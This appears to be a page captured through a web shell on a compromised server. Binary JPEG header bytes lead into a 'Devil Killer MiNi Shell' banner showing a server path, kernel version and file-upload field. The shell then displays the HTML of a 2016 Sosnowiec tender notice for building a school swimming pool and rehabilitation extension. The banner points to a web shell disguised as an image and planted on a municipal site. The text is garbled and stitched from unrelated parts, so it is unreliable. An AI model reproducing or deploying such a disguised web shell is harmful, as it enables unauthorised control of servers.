JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160601/64977-N-2016.html

<p class="kh_header"><b>Sosnowiec: Wykonanie w formule zaprojektuj i wybuduj dokumentacji projektowej oraz rozbudowanie budynku Zespołu Szkół Ogólnokształcących Nr 5 w Sosnowcu o basen rehabilitacyjny 
z funkcją sportową i zapleczem przy ul. Bohaterów Monte Cassino 46</b><br>
<b>Numer ogłoszenia: 64977 - 2016; data zamieszczenia: 01.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sosnowiec - miasto posiadające prawa powiatu - reprezentowana przez Prezydenta Miasta , al. Zwycięstwa 20, 41-200 Sosnowiec, woj. śląskie, tel. 32 2960600, faks 32 296 06 05.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie w formule zaprojektuj i wybuduj dokumentacji projektowej oraz rozbudowanie budynku Zespołu Szkół Ogólnokształcących Nr 5 w Sosnowcu o basen rehabilitacyjny 
z funkcją sportową i zapleczem przy ul. Bohaterów Monte Cassino 46.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie w formule zaprojektuj i wybuduj krytego basenu pływackiego wraz z zagospodarowaniem terenu pod nazwą: Rozbudowa Zespołu Szkół Ogólnokształcących Nr 5 w Sosnowcu o basen rehabilitacyjny z funkcją sportową i zapleczem (pomieszczenia higieniczno-sanitarne, socjalne, salki rehabilitacyjne) w ramach zadania p.n: Budowa basenu przy Zespole Szkół Ogólnokształcących nr 5 i Przedszkola nr 43 przy ul. Bohaterów Monte Cassino. 
2. Zakres przedmiotu zamówienia obejmuje wykonanie:
a) projektów wykonawczych wraz z wszystkimi uzgodnieniami i opracowaniami niezbędnymi do realizacji zadania, uzgodnienia tych projektów z Zamawiającym, należy zachować wszystkie wymagania określone w opracowaniach:
- Programie Funkcjonalno - Użytkowym
- Projekcie budowlanym wykonanym przez Pracownię Projektową PION Andrzej Kusztelak z siedzibą w Łodzi, z grudnia 2015 r.
- Prace projektowe winny być wykonywane ze szczególnym uwzględnieniem minimalizacji kosztów eksploatacji obiektu. 
b) wielobranżowych projektów wykonawczych we wszystkich branżach (jako opracowań uszczegółowiających projekt budowlany), zatwierdzenie tych projektów przez Zamawiającego pod względem materiałowym,
c) inwentaryzacji obiektu szkoły dla części dotyczącej zmiany sposobu użytkowania,
d) inwentaryzacji zieleni,
e) dokumentacji geologiczno-inżynierskiej,
f) kosztorysów inwestorskich i szczegółowych specyfikacji technicznych wykonania i odbioru robót budowlanych oraz zatwierdzenie tych opracowań przez Zamawiającego,
g) wykonanie robót budowlanych  oraz uzyskanie wymaganych efektów (parametrów użytkowych, technicznych, technologicznych, jakościowych, wizualnych, estetycznych i funkcjonalnych, eksploatacyjnych), wynikających z niniejszego PFU, Projektu Budowlanego, warunków technicznych gestorów sieci i dostawców mediów, zarządców dróg publicznych i innych wydanych uzgodnień, kosztorysów i specyfikacji technicznych wykonania i odbioru robót budowlanych oraz celu jakiego chce osiągnąć Zamawiający oraz zgodnych z przepisami obowiązującego prawa, jak również uzyskanie pozwolenia na użytkowanie obiektu, certyfikatu (homologacji) Polskiego Związku Pływackiego i innych wymaganych opinii i badań,
h) uruchomienie całego obiektu kubaturowego i wszystkich jego elementów i wbudowanych urządzeń oraz wszystkich urządzeń, obiektów i elementów zagospodarowania terenu, wraz z wyposażeniem kompletnym obiektu wymaganym do jego prawidłowego użytkowania bez konieczności dodatkowego doposażania ze strony użytkownika oraz wg wymagań wynikających z obowiązujących przepisów, wyposażenia p. poż. wg wymagań obowiązujących przepisów i Programu Funkcjonalno-Użytkowego oraz wyposażeniem w instrukcje ogólne i stanowiskowe w szczególności w zakresie: instrukcji ogólnych użytkownika obiektu i urządzeń technologicznych w tym m.in. technologii basenowej, instrukcji dla użytkowania urządzeń i wyposażenia ruchomego, instrukcji bhp, instrukcji p. poż. dla całego rozbudowanego obiektu (szkoły wraz z pływalnią), w tym scenariusza ewakuacji obiektów, instrukcji przechowywania i pracy ze środkami chemicznymi, itp.
i) obsługi technicznej przez okres minimum 36 miesięcy, począwszy od daty przekazania obiektu do użytkowania, wykonanych instalacji w tym instalacji uzdatniania wody oraz wentylacji mechanicznej wraz z zapewnieniem dostaw materiałów eksploatacyjnych w tym: środków chemicznych do uzdatniania wody basenowej oraz filtrów powietrza w instalacjach wentylacyjnych, w obsłudze technicznej Wykonawca ma zapewnić parametry fizykochemiczne wody basenowej zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 09.11.2015r. przy zachowaniu zużycia wody dla technologii basenowej w ilości 30 l na jednego użytkownika.
3. Parametry charakterystyczne określające zakres robót                               
Projekt budowlany zakłada rozbudowę Zespołu Szkół Ogólnokształcących nr 5 w Sosnowcu przy ul. Bohaterów Monte Cassino 46 o krytą pływalnię z basenem pływackim, brodzikiem dla dzieci oraz basenem rehabilitacyjnym i zapleczem (pomieszczenia higieniczno-sanitarne, socjalne, salki rehabilitacyjne).
Projektowaną rozbudowę zlokalizowano na wolnym terenie boisk i terenów zielonych, pomiędzy głównym budynkiem szkoły i ul. Bohaterów Monte Cassino. Połączenie budynków będzie w miejscu klatki schodowej i korytarza trzykondygnacyjnej części istniejącego budynku ZSO nr 5 w Sosnowcu. Obiekt przewidziany jest jako Basen Kryty z realizacją funkcji: 
Pływalnia posiadać będzie narożnikowo zlokalizowane, zadaszone, wejście, na poziom parteru bezpośrednio z poziomu istniejącego chodnika ul. Bohaterów Monte Cassino. Poziom parteru obiektu projektuje się nieznacznie wyniesiony ponad istniejący teren chodnika ul. Bohaterów Monte Cassino oraz znacznie wyniesiony ponad istniejący teren boisk szkolnych (około 1,5 m - szczegóły w części rysunkowej projektu budowlanego.
Bilans terenu dla projektu budowy Krytej Pływalni:
- powierzchnia zabudowy - 1819,79 m2
- powierzchnia zabudowy istniejącej szkoły - 4514,00 m2
- w wyniku rozbudowy powierzchnia zabudowy zwiększy się do - 6333,79 m2
- kubatura części dobudowywanej - 22737,50 m3
- kubatura części istniejącej - 19688,00 m3
- w wyniku rozbudowy kubatura zwiększy się do - 42425,50 m3
- powierzchnia terenu objętego inwestycją około - 3000 m2
Projektowany obiekt powinien się składać z minimum następujących obszarów funkcjonalnych: 
- Rehabilitacji ruchowej dzieci niepełnosprawnych
- Nauki pływania i organizacji zawodów rangi międzyszkolnej
- Dydaktyczne w połączeniu z ZSO Nr 5 
- Rekreacyjne dla mieszkańców miasta 
4. Charakterystyczne parametry określające wielkość obiektu i robót budowlanych
Basen pływacki z wydzieloną częścią z dnem ruchomym (funkcja terapii ruchowej)
- basen o wymiarach: 25,0 m x 16,5 m o powierzchni lustra wody 412,50 m2
- powierzchnia lustra wody: 412,5 m2
- głębokość: 1,2 - 1,8  m
- objętość basenu: V = 618,75 m3
- objętość zbiornika wyrównawczego: V = 21 m3 objętości czynnej
- Ilość wody obiegowej Q = 214 m3 / h
- ruchome dno typu I lub II zgodnie z normą PN EN13451 11 zamontowane na dwóch skrajnych torach basenu od strony trybun z zakresem pracy na głębokości od 0,0 m do minus 1,8 m.
- na całej krawędzi rynny przelewowej od strony trybun należy zamontować łatwo demontowane (wyjmowane) poręcze ze stali nierdzewnej przeznaczone do ćwiczeń korekcyjnych w wodzie z wykorzystaniem dna ruchomego.
Basen terapii ruchowej z torem do nauki pływania 
- basen o kształcie nieregularnym o powierzchni lustra wody 100,58 m2
- głębokość:  1,2 m
- objętość basenu: V = 120 m3
- objętość zbiornika wyrównawczego: V = 11 m3 objętości czynnej
- Ilość wody obiegowej  Q = 160 m3/h
Urządzenia wodne do terapii:
- leżanki z masażem powietrznym - 4 szt.
- siedziska z masażem powietrznym - 6 szt.
- Gejzer powietrzny - 1 szt. 
- masaż karku szeroki - 1 szt.
- masaż karku wąski - 2 szt.
Przyjmuje się jednoczesność pracy urządzeń nie większej niż 70 procent.
Brodzik dla dzieci
- basen o kształcie nieregularnym
- powierzchnia lustra wody: A = 14,63 m2
- głębokość: 0,30 m
- objętość basenu: V = 4,39 m3
- objętość zbiornika wyrównawczego: 1,5 m3 objętości czynnej
- Ilość wody obiegowej Q = 15 m3/h
Atrakcje wodne: 
Parasol wodny - 1 szt.
Zabawki wodne - 3 szt. (niestanowiące niezależne obiegi)
Zjeżdżalnia słoń (sucha) 
Sauna turecka
Powierzchnia 10,64 m2
Wnętrze kabiny wykonane z materiałów o dużej odporności na działanie wilgoci i dużą wytrzymałość mechaniczną, wyposażona w generator pary i sterownik do generatora pary.
Sauna fińska
Powierzchnia 10,76 m2
Wnętrze kabiny wyłożone wysokiej klasy drzewem iglastym. Wyposażona w ławy o odpowiedniej konstrukcji i odpowiednich wymiarach oraz piec do sauny.
Natrysk wrażeń
Powierzchnia 2,18 m2
Pomieszczenie znajduje się pomiędzy saunami. Wyposażenie w urządzenie działające jako połączenie strumieni wody przemiennie ciepłej i zimnej z efektem świetlnym.
Wyposażenie toalet
Muszla sedesowa, umywalka, armatura, podajnik papieru, podajnik mydła, pisuar. W toaletach dla niepełnosprawnych umywalki, pochwyty.
Wyposażenie natrysków
Kabina prysznicowa ogólnodostępna, podajnik mydła. Kabina dla niepełnosprawnych z pochwytami  i siedziskiem.
Wyposażenie meblowe
szatni odzieży zewnętrznej: 
Wieszaki, lada krzesła
kasy biletowej:
Stanowisko kasowe z system kontroli dostępu
przebieralnie:
szafki na odzież, ławki
pokój ratownika:
biurko, krzesła
widownia:
siedziska widowni (min 104 szt.)
siedziska dla zawodników 48 szt.
magazyn wózków:
4 wózki dla niepełnosprawnych
Sprzęt specjalistyczny wyposażenia basenowego
- odkurzacz basenowy przeznaczony dla basenów publicznych 25 - cio metrowych wyposażony w mikroprocesorowy układ sterowania i diagnostyki z oprogramowaniem, przewód pływający min. 30 m z obrotnicą, wydajność pompy - min 16 m3/h,
-  podbieraki teleskopowe dł. min. 8 m, średnica oczek max. 2 mm - szt. 2,
-  sprzęt ratowniczy i pomocniczy oraz urządzenia sygnalizacyjne i ostrzegawcze,
-  myjka wysokościowa na zimną wodę parametry: ciśnienie min. 170 bar wydajność zakresie 300 - 500 l/h,
-  przenośny fotometr do badania zawartości w wodzie chloru wolnego i całkowitego.
5. Prace przedprojektowe 
Przed rozpoczęciem prac projektowych Wykonawca zobowiązany jest pozyskać i zweryfikować wszelkie dane i materiały niezbędne do realizacji robót objętych zamówieniem (dane wyjściowe do projektowania). Wykonawca na własny koszt wykona wszelkie konieczne badania i analizy niezbędne do prawidłowego wykonania Dokumentów Wykonawcy, w tym Projektu Budowlanego.
 W szczególności Wykonawca pozyska: 
- mapę do celów projektowych z wymaganym obszarem opracowania
- badania geotechniczne i hydrogeologiczne, dokumentację geologiczno-inżynierską podłoża gruntowego w zakresie niezbędnym do prawidłowego posadowienia obiektów budowlanych
- inne niezbędne dane dla prawidłowego wykonania Dokumentów Wykonawcy i późniejszej realizacji robót: materiały, ekspertyzy, analizy, opracowania i badania itp., uzgodnienia branżowe
6. Prace projektowe 
Wykonawca opracuje dokumenty obejmujące co najmniej: 
- Opracowanie koncepcji szczegółowych opracowań branżowych w oparciu o Projekt Budowlany stanowiący załącznik do niniejszej SIWZ,
- Dokumentację wykonawczą dla celów realizacji inwestycji. Projekty techniczne wykonawcze stanowić będą uszczegółowienie dla potrzeb wykonawstwa projektu budowlanego. Dokumentacja powinna być opracowana z uwzględnieniem warunków zatwierdzenia Projektu Budowlanego oraz warunków zawartych w uzyskanych opiniach i uzgodnieniach, jak również szczegółowych wytycznych Zamawiającego,
- Projekty wykonawcze sporządzone będą oddzielnie dla każdej branży, 
- Plan Bezpieczeństwa i Ochrony Zdrowia, 
- Instrukcje bhp, p.poż, pierwszej pomocy, instrukcje stanowiskowe, 
- Dokumentację niezbędną do uzyskania wymaganych przez przepisy pozwoleń na eksploatację obiektu oraz pozwolenia na użytkowanie,
- Dokumentację powykonawczą z naniesionymi w sposób czytelny wszelkimi zmianami wprowadzonymi w trakcie budowy wraz z inwentaryzacją geodezyjną wykonanych obiektów i podłączeń, instrukcję eksploatacji. 
Przed rozpoczęciem prac Wykonawca zweryfikuje dane wyjściowe do projektowania, przygotowane przez Zamawiającego, wykona na własny koszt wszystkie badania i analizy (w tym technologiczne), inwentaryzacje uzupełniające niezbędne dla prawidłowego wykonania dokumentów .
Wykonawca uzyska wszelkie uzgodnienia, opinie i decyzje administracyjne, wymagane zgodnie z prawem polskim, niezbędne dla zaprojektowania, wybudowania, uruchomienia i przekazania obiektu do użytkowania. 
Jeżeli prawo lub względy praktyczne wymagają, aby niektóre dokumenty Wykonawcy były poddane weryfikacji przez osoby uprawnione lub uzgodnieniu przez odpowiednie władze, to przeprowadzenie weryfikacji i lub uzyskanie uzgodnień będzie przeprowadzone przez Wykonawcę na jego koszt przed przedłożeniem tej dokumentacji do zatwierdzenia przez Zamawiającego. Dokonanie weryfikacji i lub uzyskanie uzgodnień nie przesądza o zatwierdzeniu przez Zamawiającego, który odmówi zatwierdzenia w każdym przypadku, kiedy stwierdzi, że dokument Wykonawcy nie spełnia wymagań Zamówienia. 
W szczególności Wykonawca uzyska wszelkie, wymagane zgodnie z prawem polskim, uzgodnienia, opinie i decyzje administracyjne, niezbędne dla zaprojektowania, wybudowania, uruchomienia i przekazania obiektów Basenowych do użytkowania. Zatwierdzenie jakiegokolwiek dokumentu przez Zamawiającego nie ogranicza odpowiedzialności Wykonawcy wynikającej z Zamówienia. 
7. Zakres robót budowlanych i rozbiórkowych 
Wykonanie basenu krytego należy prowadzić wykonując obiekt kubaturowy mieszczący niezbędne pomieszczenia i urządzenia dla uzyskania zakładanych efektów.  
Przewiduje się, że zostaną wykonane obiekty i urządzenia:  
a) Obiekty kubaturowe do budowy: 
- budowa budynku basenu obejmującego wszelkie niezbędne pomieszczenia do prawidłowego funkcjonowania obiektu oraz zapewniającego odpowiedni standard dla osób korzystających, obsługi technicznej oraz lokalizację i montaż urządzeń technologicznych niezbędnych do funkcjonowania basenu
- wykonanie połączenia komunikacyjnego pomiędzy basenem, a istniejącą szkołą wraz w wykonaniem nowej windy dla osób niepełnosprawnych.
b) Wewnętrzne instalacje wodociągowe, kanalizacyjne, grzewcze, wentylacyjne i klimatyzacyjne. 
c) Urządzenia i instalacje technologiczne: 
- uzbrojenie basenu w niezbędne elementy technologiczne 
- montaż stacji uzdatniania wody basenowej 
- montaż urządzeń chemii basenowej 
- montaż urządzeń wentylacyjnych, grzewczych 
- montaż urządzeń grzewczych wody basenowej 
- uzbrojenie instalacji i urządzeń w AKPiA 
- zewnętrzne instalacje i sieci technologiczne 
d) Instalacje elektryczne i AKPiA w obiektach na terenie basenu: 
- montaż rozdzielni zasilająco-sterowniczej
- montaż instalacji zasilania urządzeń technologicznych 
- montaż instalacji oświetlenia i gniazd wtykowych 
- montaż instalacji teletechnicznych, 
- instalacja AKPiA 

- instalacja odgromowa budynku; instalacja monitoringu; instalacja kontroli dostępu 
- instalacja systemu alarmowego antywłamaniowego, instalacja systemu detekcji dymu i gazów, 
- instalacja nagłośnienia i multimedialna, instalacja telefoniczna,
- instalacja zdalnego monitoringu pracy urządzeń instalacyjnych,
- instalacja elektronicznego systemu sprzedaży biletów oraz karnetów na basen.
e) Obiekty zagospodarowania terenu: 
- należy rozebrać kolidujące z terenem budowy boiska,
- należy usunąć drzewa po uprzednim dokonaniu odpowiednich uzgodnień,
- wykonanie chodnika,
- wykonanie elementów małej architektury,
- wykonanie zieleni.
f) Zaplecze:
Wykonawca wykona wszystkie prace wstępne potrzebne do zorganizowania zaplecza socjalnego.
g) Wykonawca zapewni ochronę mienia znajdującego się na terenie budowy.
Szczegółowy przedmiot zamówienia został opisany w Programie Funkcjonalno-Użytkowym (PFU), Projekcie Budowlanym będącym Załącznikiem do niniejszej Specyfikacji Istotnych Warunków Zamówienia (SIWZ) i stanowiącym integralną jej część.  
8. W ramach odrębnego zamówienia Zamawiający planuje wykonanie termomodernizacji Zespołu Szkół Ogólnokształcących Nr 5 w Sosnowcu przy ul. Bohaterów Monte Cassino 46. W związku z powyższym Zamawiający wymaga koordynacji robót dwóch wykonawców w uzgodnieniu z Zamawiającym.
9. Jeżeli Zamawiający w opisie przedmiotu zamówienia wskazał znaki towarowe, patenty lub pochodzenia, a także normy, aprobaty techniczne oraz systemy odniesienia, dopuszcza zaoferowanie rozwiązań równoważnych opisanym, pod warunkiem zachowania przez nie takich samych minimalnych parametrów technicznych, jakościowych oraz funkcjonalnych itp. Wykonawca, który powołuje się na rozwiązana równoważne opisanym przez Zamawiającego, jest obowiązany wskazać, że oferowany przez niego przedmiot zamówienia spełnia wymagania określone przez Zamawiającego.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje zamówienia uzupełniające, o których mowa w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych, w wysokości 16 procent zamówienia podstawowego, polegające na powtórzeniu tego samego rodzaju zamówień.
Ewentualny zakres robót uzupełniających:
a) roboty ogólnobudowlane konstrukcyjne,
b) roboty instalacyjne,
c) roboty sieciowe.
Zamówienie uzupełniające zostanie ewentualnie udzielone na warunkach określonych w ustawie Prawo zamówień publicznych w trybie zamówienia z wolnej ręki.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.30.00-7, 45.21.22.12-5, 71.24.80.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2018.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1) Wykonawca zobowiązany jest przed upływem terminu składania ofert wnieść wadium w wysokości: 350 000,00 zł (słownie złotych: trzysta pięćdziesiąt tysięcy 00/100)
2) Wadium może być wnoszone w formach określonych w art. 45 ust. 6 pkt 1-5 ustawy.
3) Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego: Gmina Sosnowiec, ING Bank Śląski, Nr 97 1050 1142 1000 0008 0000 1208. Za skutecznie wniesione wadium w pieniądzu Zamawiający uzna wadium, które w oznaczonym terminie znajduje się na rachunku Zamawiającego. Do oferty należy dołączyć kopię polecenia przelewu. 
4) Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
5) W przypadku wyboru formy niepieniężnej wadium, oryginał dokumentu należy złożyć w Wydziale Finansowym Urzędu Miejskiego w Sosnowcu, Al. Zwycięstwa 20, II piętro, pokój 310. Do oferty należy dołączyć kserokopię złożonego dokumentu. Wadium wnoszone w formie innej niż w pieniądzu musi spełniać wymagania wynikające z ustawy Prawo zamówień publicznych, w szczególności określać bezwarunkowy, nieodwołalny obowiązek zapłaty na pierwsze żądanie Zamawiającego, w przypadkach określonych w ustawie oraz być ważne przez okres związania ofertą, określony w niniejszej SIWZ. Musi być wykonalne na terytorium Rzeczypospolitej Polskiej.
6) Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza z zastrzeżeniem pkt 11).
7) Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
8) Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
9) Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie pkt 6, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
11) Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę. 12) Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Prawo zamówień publicznych, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy Prawo zamówień publicznych, co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.
12) Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 
c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku udziału w postępowaniu w tym zakresie. Wykonawca zobowiązany jest złożyć oświadczenie zgodnie ze wzorem stanowiącym załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
